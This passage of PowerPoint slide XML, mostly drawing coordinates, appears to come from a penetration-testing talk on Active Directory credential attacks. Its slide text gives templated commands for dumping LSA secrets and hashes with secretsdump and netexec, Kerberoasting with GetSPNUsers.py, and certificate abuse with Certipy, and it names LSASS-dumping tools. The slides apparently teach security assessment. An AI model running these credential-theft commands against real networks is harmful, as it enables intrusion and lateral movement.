                    <a:pt x="3553327" y="1022565"/>
                    <a:pt x="3388028" y="856904"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="190576" y="2122564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2122368" y="190771"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2251125" y="62001"/>
                    <a:pt x="2459895" y="61992"/>
                    <a:pt x="2588665" y="190748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2588674" y="190757"/>
                    <a:pt x="2588680" y="190762"/>
                    <a:pt x="2588689" y="190771"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2698345" y="300427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300232" y="2698541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190576" y="2588885"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="61980" y="2460044"/>
                    <a:pt x="61980" y="2251405"/>
                    <a:pt x="190576" y="2122564"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="517189" y="3268206"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="444910" y="3267664"/>
                    <a:pt x="375762" y="3238653"/>
                    <a:pt x="324726" y="3187471"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219922" y="3082398"/>
                    <a:pt x="219922" y="2912328"/>
                    <a:pt x="324726" y="2807255"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2807059" y="324921"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2912259" y="220423"/>
                    <a:pt x="3082075" y="220423"/>
                    <a:pt x="3187275" y="324921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3291255" y="429594"/>
                    <a:pt x="3293342" y="597921"/>
                    <a:pt x="3191985" y="705137"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="710783" y="3186340"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="659125" y="3237429"/>
                    <a:pt x="589827" y="3266736"/>
                    <a:pt x="517189" y="3268206"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3321424" y="1389828"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1389633" y="3321621"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1260876" y="3450391"/>
                    <a:pt x="1052106" y="3450401"/>
                    <a:pt x="923336" y="3321644"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="923326" y="3321635"/>
                    <a:pt x="923322" y="3321630"/>
                    <a:pt x="923312" y="3321621"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="816011" y="3214320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3214124" y="816207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321424" y="923507"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3450021" y="1052349"/>
                    <a:pt x="3450021" y="1260987"/>
                    <a:pt x="3321424" y="1389828"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="47030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396175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LOCAL ADMIN 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1905660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NETEXEC OR SECRETSDUMP.PY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1974" y="2414981"/>
            <a:ext cx="6458336" cy="512577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&lt;HOST or HOSTLIST&gt; -u &lt;ADMIN USER&gt; -H or -p &lt;PASS OR HASH&gt; --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lsa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5382476" y="3039678"/>
            <a:ext cx="6467834" cy="77864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PLAINTEXT:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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  <a:p>
            <a:pPr algn="ctr"/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secretsdump.py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&lt;ADMIN USER&gt;:&lt;PASSWORD&gt;@&lt;HOST&gt; -history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3B344-A808-E601-04B2-61C051D7DFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="3930442"/>
            <a:ext cx="6451592" cy="77864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HASHES:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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secretsdump.py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&lt;ADMIN USER&gt;@&lt;HOST&gt; -hashes &lt;HASH&gt; -history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358532" y="277127"/>
            <a:ext cx="573746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LSA SECRETS DUMPS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91CA41-7506-B2C8-7302-938527379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A5D386-7148-4DC8-ACE4-E863900D17D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="4851029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MULTIPLE TYPES OF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CD2767-BE02-365F-FA26-77883202348E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="5360350"/>
            <a:ext cx="6451592" cy="589513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 err="1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MSCAche</a:t>
            </a:r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, MACHINE ACCOUNT HASHES, PLAINTEXT CREDENTIALS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AB92F-88E5-062C-A9A5-B9E3BD353A56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382477" y="6074464"/>
            <a:ext cx="6451592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od Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>REPEAT WITH Each NEW LOCAL ADMIN/DOMAIN USER ACCOUNT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2852741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" b="1831"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1609118"/>
            <a:ext cx="4546948" cy="438044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7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CREDS OR HASHES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293966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BLOODHOUND SCRAPER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8718" y="2781768"/>
            <a:ext cx="6451592" cy="83825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BLOODHOUND.PY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SHARPHOUND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OTHERS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3B344-A808-E601-04B2-61C051D7DFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4386270"/>
            <a:ext cx="6427229" cy="58124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PRECONFIGURED TO ALSO ANALYZE CERTIPY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566922" y="61813"/>
            <a:ext cx="5529078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BLOODHOUND DATA </a:t>
            </a:r>
          </a:p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COLLECTION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5B0DCDC-642B-8EC4-4F29-BFAFB1E68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2D3B59-2FAA-AE06-3E51-13ACF4D45180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3898468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LY4K BLOODHOUND FORK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DC1315-F999-559D-DF96-B50028BA2283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="5298987"/>
            <a:ext cx="6451592" cy="5812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QUICK AND EASY IDENTIFICATION OF USEFUL PATHS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25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-533"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1591319"/>
            <a:ext cx="4972832" cy="359304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7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CREDS OR HASHES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231336"/>
            <a:ext cx="6451592" cy="5097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RETRIEVE CERTIFICATE DATA WITH CERTIPY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8718" y="2844398"/>
            <a:ext cx="6435350" cy="6221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certipy</a:t>
            </a:r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find -u &lt;DOMAIN USER&gt;@&lt;DOMAIN&gt; -p &lt;PASSWORD&gt; -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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ip</a:t>
            </a:r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&lt;DC&gt;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2395948" y="277127"/>
            <a:ext cx="370005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AD CS ABUSE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13AFE5-EBC4-853A-D974-4E1E47520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EC6AE9-26E2-E143-B2BF-8FE98AC4930F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3698052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LOAD DATA INTO BLOODHOUND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FF506-74AC-5A60-5AF8-B44CD74D79DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4206165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LOOK FOR VULNERABLE TEMPLATES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90B757-A6B5-22EE-8907-1D72AD395BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4756348"/>
            <a:ext cx="6451592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MISCONFIGURATIONS ARE COMMON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758A9-37A1-81C3-4A4F-66569DDD1530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="5312890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EXPLOIT USING CERTIPY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2B56B4-5494-3FAB-8ED0-BF3D1DDB4401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5390597" y="5869431"/>
            <a:ext cx="6451592" cy="62217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REPEAT WITH EACH NEW LOCAL ADMIN/DOMAIN USER ACCOUNT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6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icture Placeholder 5" descr="Key outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4CABE9B-7ED8-9AD3-C704-587AEB48C8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5400000">
            <a:off x="281137" y="2485362"/>
            <a:ext cx="4511630" cy="2236630"/>
            <a:chOff x="205983" y="2993684"/>
            <a:chExt cx="4511630" cy="2236630"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000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5F7A51-3C86-0559-C575-4B404ECE8FF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="205983" y="2993684"/>
              <a:ext cx="4511630" cy="2154725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2024628 w 4511630"/>
                <a:gd name="connsiteY0" fmla="*/ 564579 h 2154725"/>
                <a:gd name="connsiteX1" fmla="*/ 564577 w 4511630"/>
                <a:gd name="connsiteY1" fmla="*/ 130096 h 2154725"/>
                <a:gd name="connsiteX2" fmla="*/ 130094 w 4511630"/>
                <a:gd name="connsiteY2" fmla="*/ 1590148 h 2154725"/>
                <a:gd name="connsiteX3" fmla="*/ 1590146 w 4511630"/>
                <a:gd name="connsiteY3" fmla="*/ 2024630 h 2154725"/>
                <a:gd name="connsiteX4" fmla="*/ 2024628 w 4511630"/>
                <a:gd name="connsiteY4" fmla="*/ 1590148 h 2154725"/>
                <a:gd name="connsiteX5" fmla="*/ 2357938 w 4511630"/>
                <a:gd name="connsiteY5" fmla="*/ 1590148 h 2154725"/>
                <a:gd name="connsiteX6" fmla="*/ 2563051 w 4511630"/>
                <a:gd name="connsiteY6" fmla="*/ 1385034 h 2154725"/>
                <a:gd name="connsiteX7" fmla="*/ 2768165 w 4511630"/>
                <a:gd name="connsiteY7" fmla="*/ 1590148 h 2154725"/>
                <a:gd name="connsiteX8" fmla="*/ 3101475 w 4511630"/>
                <a:gd name="connsiteY8" fmla="*/ 1256838 h 2154725"/>
                <a:gd name="connsiteX9" fmla="*/ 3434784 w 4511630"/>
                <a:gd name="connsiteY9" fmla="*/ 1590148 h 2154725"/>
                <a:gd name="connsiteX10" fmla="*/ 3768094 w 4511630"/>
                <a:gd name="connsiteY10" fmla="*/ 1256838 h 2154725"/>
                <a:gd name="connsiteX11" fmla="*/ 4101404 w 4511630"/>
                <a:gd name="connsiteY11" fmla="*/ 1590148 h 2154725"/>
                <a:gd name="connsiteX12" fmla="*/ 4511631 w 4511630"/>
                <a:gd name="connsiteY12" fmla="*/ 1077363 h 2154725"/>
                <a:gd name="connsiteX13" fmla="*/ 4101404 w 4511630"/>
                <a:gd name="connsiteY13" fmla="*/ 564579 h 2154725"/>
                <a:gd name="connsiteX14" fmla="*/ 4092994 w 4511630"/>
                <a:gd name="connsiteY14" fmla="*/ 1436825 h 2154725"/>
                <a:gd name="connsiteX15" fmla="*/ 3840807 w 4511630"/>
                <a:gd name="connsiteY15" fmla="*/ 1184484 h 2154725"/>
                <a:gd name="connsiteX16" fmla="*/ 3768094 w 4511630"/>
                <a:gd name="connsiteY16" fmla="*/ 1111976 h 2154725"/>
                <a:gd name="connsiteX17" fmla="*/ 3695740 w 4511630"/>
                <a:gd name="connsiteY17" fmla="*/ 1184484 h 2154725"/>
                <a:gd name="connsiteX18" fmla="*/ 3434784 w 4511630"/>
                <a:gd name="connsiteY18" fmla="*/ 1445388 h 2154725"/>
                <a:gd name="connsiteX19" fmla="*/ 3174187 w 4511630"/>
                <a:gd name="connsiteY19" fmla="*/ 1184484 h 2154725"/>
                <a:gd name="connsiteX20" fmla="*/ 3101475 w 4511630"/>
                <a:gd name="connsiteY20" fmla="*/ 1111976 h 2154725"/>
                <a:gd name="connsiteX21" fmla="*/ 3029121 w 4511630"/>
                <a:gd name="connsiteY21" fmla="*/ 1184484 h 2154725"/>
                <a:gd name="connsiteX22" fmla="*/ 2768165 w 4511630"/>
                <a:gd name="connsiteY22" fmla="*/ 1445388 h 2154725"/>
                <a:gd name="connsiteX23" fmla="*/ 2635713 w 4511630"/>
                <a:gd name="connsiteY23" fmla="*/ 1312680 h 2154725"/>
                <a:gd name="connsiteX24" fmla="*/ 2563051 w 4511630"/>
                <a:gd name="connsiteY24" fmla="*/ 1240223 h 2154725"/>
                <a:gd name="connsiteX25" fmla="*/ 2490646 w 4511630"/>
                <a:gd name="connsiteY25" fmla="*/ 1312680 h 2154725"/>
                <a:gd name="connsiteX26" fmla="*/ 2315582 w 4511630"/>
                <a:gd name="connsiteY26" fmla="*/ 1487796 h 2154725"/>
                <a:gd name="connsiteX27" fmla="*/ 1963863 w 4511630"/>
                <a:gd name="connsiteY27" fmla="*/ 1487796 h 2154725"/>
                <a:gd name="connsiteX28" fmla="*/ 1934685 w 4511630"/>
                <a:gd name="connsiteY28" fmla="*/ 1541279 h 2154725"/>
                <a:gd name="connsiteX29" fmla="*/ 613702 w 4511630"/>
                <a:gd name="connsiteY29" fmla="*/ 1934585 h 2154725"/>
                <a:gd name="connsiteX30" fmla="*/ 220400 w 4511630"/>
                <a:gd name="connsiteY30" fmla="*/ 613601 h 2154725"/>
                <a:gd name="connsiteX31" fmla="*/ 1541380 w 4511630"/>
                <a:gd name="connsiteY31" fmla="*/ 220295 h 2154725"/>
                <a:gd name="connsiteX32" fmla="*/ 1934685 w 4511630"/>
                <a:gd name="connsiteY32" fmla="*/ 613601 h 2154725"/>
                <a:gd name="connsiteX33" fmla="*/ 1963863 w 4511630"/>
                <a:gd name="connsiteY33" fmla="*/ 667084 h 2154725"/>
                <a:gd name="connsiteX34" fmla="*/ 4052330 w 4511630"/>
                <a:gd name="connsiteY34" fmla="*/ 667084 h 2154725"/>
                <a:gd name="connsiteX35" fmla="*/ 4215909 w 4511630"/>
                <a:gd name="connsiteY35" fmla="*/ 871685 h 2154725"/>
                <a:gd name="connsiteX36" fmla="*/ 2152824 w 4511630"/>
                <a:gd name="connsiteY36" fmla="*/ 871685 h 2154725"/>
                <a:gd name="connsiteX37" fmla="*/ 2152824 w 4511630"/>
                <a:gd name="connsiteY37" fmla="*/ 974242 h 2154725"/>
                <a:gd name="connsiteX38" fmla="*/ 4297954 w 4511630"/>
                <a:gd name="connsiteY38" fmla="*/ 974242 h 2154725"/>
                <a:gd name="connsiteX39" fmla="*/ 4380512 w 4511630"/>
                <a:gd name="connsiteY39" fmla="*/ 1077466 h 215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11630" h="2154725">
                  <a:moveTo>
                    <a:pt x="2024628" y="564579"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1741427" y="41415"/>
                    <a:pt x="1087740" y="-153109"/>
                    <a:pt x="564577" y="130096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41416" y="413297"/>
                    <a:pt x="-153108" y="1066984"/>
                    <a:pt x="130094" y="1590148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="413296" y="2113311"/>
                    <a:pt x="1066983" y="2307835"/>
                    <a:pt x="1590146" y="2024630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1774087" y="1925057"/>
                    <a:pt x="1925055" y="1774088"/>
                    <a:pt x="2024628" y="1590148"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2357938" y="1590148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2563051" y="1385034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2768165" y="1590148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101475" y="1256838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3434784" y="1590148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3768094" y="1256838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4101404" y="1590148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4511631" y="1077363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4101404" y="564579"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4092994" y="1436825"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3840807" y="1184484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3768094" y="1111976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3695740" y="1184484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3434784" y="1445388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3174187" y="1184484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101475" y="1111976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3029121" y="1184484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2768165" y="1445388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635713" y="1312680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2563051" y="1240223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2490646" y="1312680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2315582" y="1487796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963863" y="1487796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1934685" y="1541279"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1678514" y="2014666"/>
                    <a:pt x="1087089" y="2190757"/>
                    <a:pt x="613702" y="1934585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140317" y="1678413"/>
                    <a:pt x="-35772" y="1086988"/>
                    <a:pt x="220400" y="613601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476568" y="140214"/>
                    <a:pt x="1067993" y="-35877"/>
                    <a:pt x="1541380" y="220295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1707907" y="310412"/>
                    <a:pt x="1844574" y="447079"/>
                    <a:pt x="1934685" y="613601"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1963863" y="667084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052330" y="667084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215909" y="871685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152824" y="871685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152824" y="974242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4297954" y="974242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4380512" y="1077466"/>
                  </a:ln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A4BAB4B-9EA4-8DBA-0407-1455CE0D0816}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="512784" y="3763427"/>
              <a:ext cx="615341" cy="615341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 307671 w 615341"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 615341"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 615341"/>
                <a:gd name="connsiteY1" fmla="*/ 307671 h 615341"/>
                <a:gd name="connsiteX2" fmla="*/ 307671 w 615341"/>
                <a:gd name="connsiteY2" fmla="*/ 615341 h 615341"/>
                <a:gd name="connsiteX3" fmla="*/ 615341 w 615341"/>
                <a:gd name="connsiteY3" fmla="*/ 307671 h 615341"/>
                <a:gd name="connsiteX4" fmla="*/ 307671 w 615341"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 615341"/>
                <a:gd name="connsiteX5" fmla="*/ 307671 w 615341"/>
                <a:gd name="connsiteY5" fmla="*/ 512784 h 615341"/>
                <a:gd name="connsiteX6" fmla="*/ 102557 w 615341"/>
                <a:gd name="connsiteY6" fmla="*/ 307671 h 615341"/>
                <a:gd name="connsiteX7" fmla="*/ 307671 w 615341"/>
                <a:gd name="connsiteY7" fmla="*/ 102557 h 615341"/>
                <a:gd name="connsiteX8" fmla="*/ 512784 w 615341"/>
                <a:gd name="connsiteY8" fmla="*/ 307671 h 615341"/>
                <a:gd name="connsiteX9" fmla="*/ 307671 w 615341"/>
                <a:gd name="connsiteY9" fmla="*/ 512938 h 61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5341" h="615341">
                  <a:moveTo>
                    <a:pt x="307671" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="137749" y="0"/>
                    <a:pt x="0" y="137749"/>
                    <a:pt x="0" y="307671"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="477592"/>
                    <a:pt x="137749" y="615341"/>
                    <a:pt x="307671" y="615341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477592" y="615341"/>
                    <a:pt x="615341" y="477592"/>
                    <a:pt x="615341" y="307671"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="614808" y="137970"/>
                    <a:pt x="477371" y="533"/>
                    <a:pt x="307671" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="307671" y="512784"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194391" y="512784"/>
                    <a:pt x="102557" y="420950"/>
                    <a:pt x="102557" y="307671"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102557" y="194391"/>
                    <a:pt x="194391" y="102557"/>
                    <a:pt x="307671" y="102557"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420950" y="102557"/>
                    <a:pt x="512784" y="194391"/>
                    <a:pt x="512784" y="307671"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="512697" y="420940"/>
                    <a:pt x="420939" y="512769"/>
                    <a:pt x="307671" y="512938"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="51197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7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CREDS OR HASHES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231336"/>
            <a:ext cx="6451592" cy="5097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LOOK THROUGH SYSVOL FOR SAVED CREDENTIALS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5398718" y="2925349"/>
            <a:ext cx="6451592" cy="6221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&lt;DC-IP&gt; -u &lt;USER&gt; -H or -p &lt;PASS OR HASH&gt; -M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gpp_autologin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1214535" y="277127"/>
            <a:ext cx="488146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GPP PASSWORDS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11F48A7-A24D-8F3F-0ABF-2CA428360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6B4AFB-7BE3-EB7A-4FDC-FDA86B750E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3639677"/>
            <a:ext cx="6451592" cy="6221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&lt;DC-IP&gt; -u &lt;USER&gt; -H or -p &lt;PASS OR HASH&gt; -M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gpp_password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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8B59F9-09B4-9F1F-7DC2-1743417AA809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4488307"/>
            <a:ext cx="6451592" cy="62217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NOT VERY COMMON BUT SIMPLE EXECUTION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E76780-9DBD-430C-94CE-98C2BC7B972F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="5336937"/>
            <a:ext cx="6451592" cy="62217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ONLY NEEDS TO BE DONE ONCE PER DOMAIN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5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 b="3996"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1609118"/>
            <a:ext cx="4470400" cy="430669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7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CREDS OR HASHES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231336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REQUEST TGTs FOR SPN USERS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98718" y="2806820"/>
            <a:ext cx="6435350" cy="6221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GetSPNUsers.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;DOMAIN&gt;/&lt;USER&gt;:&lt;PASSWORD&gt; -request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1519106" y="277127"/>
            <a:ext cx="457689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KERBEROASTING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5C9CD9-47AB-D36A-AD17-29DEFD28C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70B35D-1E3F-5020-62ED-7FFF4704A8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="3619763"/>
            <a:ext cx="6451592" cy="3847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ONCE PER DOMAIN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518AB0-4BD8-F99E-B0EB-FC2B5225DB38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="4195248"/>
            <a:ext cx="6451592" cy="3847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COMPUTE PLAINTEXT FROM TGTs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E40CB7-CAF3-D9CD-F495-7BBC2738C486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="4770733"/>
            <a:ext cx="6451592" cy="60318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COMPUTATION IS SLOW - NO ECONOMY OF SCALE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03D6F-51C1-4647-C0FB-5AC4D9B87CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="5564681"/>
            <a:ext cx="6451592" cy="60318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LOOK FOR PRIVILEGED ACCOUNTS AND OLD PASSWORDS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06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hand holding hot dog on bun with mustard and ketchup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r="15421"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="1609117"/>
            <a:ext cx="4513943" cy="434864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7"/>
            <a:ext cx="6451592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LOCAL ADMIN ACCESS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124022"/>
            <a:ext cx="6451592" cy="5097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CONTAINS HASHED AND PLAINTEXT CREDENTIALS FOR DOMAIN USERS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3B344-A808-E601-04B2-61C051D7DFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410899" y="4371989"/>
            <a:ext cx="6451592" cy="14344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MULTIPLE NETEXEC MODULES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1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procdump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  <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1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nanodump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/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LSASSY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Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
